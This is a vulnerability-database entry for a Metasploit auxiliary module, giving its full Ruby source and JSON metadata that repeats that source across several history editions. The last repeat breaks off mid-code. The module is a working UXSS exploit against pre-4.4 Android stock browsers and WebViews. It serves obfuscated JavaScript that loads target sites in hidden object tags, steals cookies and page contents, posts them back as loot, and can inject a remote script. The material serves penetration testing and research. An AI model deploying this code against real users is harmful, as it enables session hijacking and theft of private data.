ID MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::JSObfu
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
'Description' => %q{
This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
all versions of Android's open source stock browser before 4.4, and Android apps running
on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
to scrape both cookie data and page contents from a vulnerable browser window.
Target URLs that use X-Frame-Options can not be exploited with this vulnerability.
Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
[ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
[ 'URL', 'http://trac.webkit.org/changeset/96826' ]
],
'DefaultAction' => 'WebServer',
'DisclosureDate' => "Oct 4 2014"
))
register_options([
OptString.new('TARGET_URLS', [
true,
"The comma-separated list of URLs to steal.",
'http://example.com'
]),
OptString.new('CUSTOM_JS', [
false,
"A string of javascript to execute in the context of the target URLs.",
''
]),
OptString.new('REMOTE_JS', [
false,
"A URL to inject into a script tag in the context of the target URLs.",
''
])
])
end
def on_request_uri(cli, request)
print_status("Request '#{request.method} #{request.uri}'")
if request.method.downcase == 'post'
collect_data(request)
send_response_html(cli, '')
else
payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
domains = datastore['TARGET_URLS'].split(',')
script = js_obfuscate <<-EOS
var targets = JSON.parse(atob("#{Rex::Text.encode_base64(JSON.generate(domains))}"));
targets.forEach(function(target, i){
var obj = document.createElement('object');
obj.setAttribute('data', target);
obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');
obj.onload = function() {
obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+
'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
'));}void(0);';
obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
};
document.body.appendChild(obj);
});
window.addEventListener('message', function(e) {
var data = JSON.parse(e.data);
var x = new XMLHttpRequest;
x.open('POST', window.location, true);
x.send(e.data);
}, false);
EOS
html = <<-EOS
<html>
<body>
<script>
#{script}
</script>
</body>
</html>
EOS
print_status("Sending initial HTML ...")
send_response_html(cli, html)
end
end
def collect_data(request)
begin
response = JSON.parse(request.body)
rescue JSON::ParserError
print_error "Invalid JSON request."
else
url = response['url']
if response && url
file = store_loot("android.client", "text/plain", cli.peerhost, request.body, "aosp_uxss_#{url}", "Data pilfered from uxss")
print_good "Collected data from URL: #{url}"
print_good "Saved to: #{file}"
end
end
end
def custom_js
rjs_hook + datastore['CUSTOM_JS']
end
def rjs_hook
remote_js = datastore['REMOTE_JS']
if remote_js.present?
"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); "
else
''
end
end
def run
exploit
end
end
{"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-02T09:57:18", "history": [{"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/gather/android_object_tag_webview_uxss", "reporter": "Rapid7", "references": ["http://trac.webkit.org/changeset/96826", "http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef"], "cvelist": [], "lastseen": "2017-07-02T23:30:18", "history": [], "viewCount": 31, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\n\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-07-02T23:30:18", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/auxiliary/gather/android_object_tag_webview_uxss", "reporter": "Rapid7", "references": ["http://trac.webkit.org/changeset/96826", "http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef"], "cvelist": [], "lastseen": "2017-07-24T20:00:47", "history": [], "viewCount": 32, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-07-24T20:00:47", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:29:35", "history": [], "viewCount": 47, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-08-21T15:29:35", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-26T23:38:39", "history": [], "viewCount": 47, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-10-26T23:38:39", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-27T01:39:40", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2017-10-27T01:39:40"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n 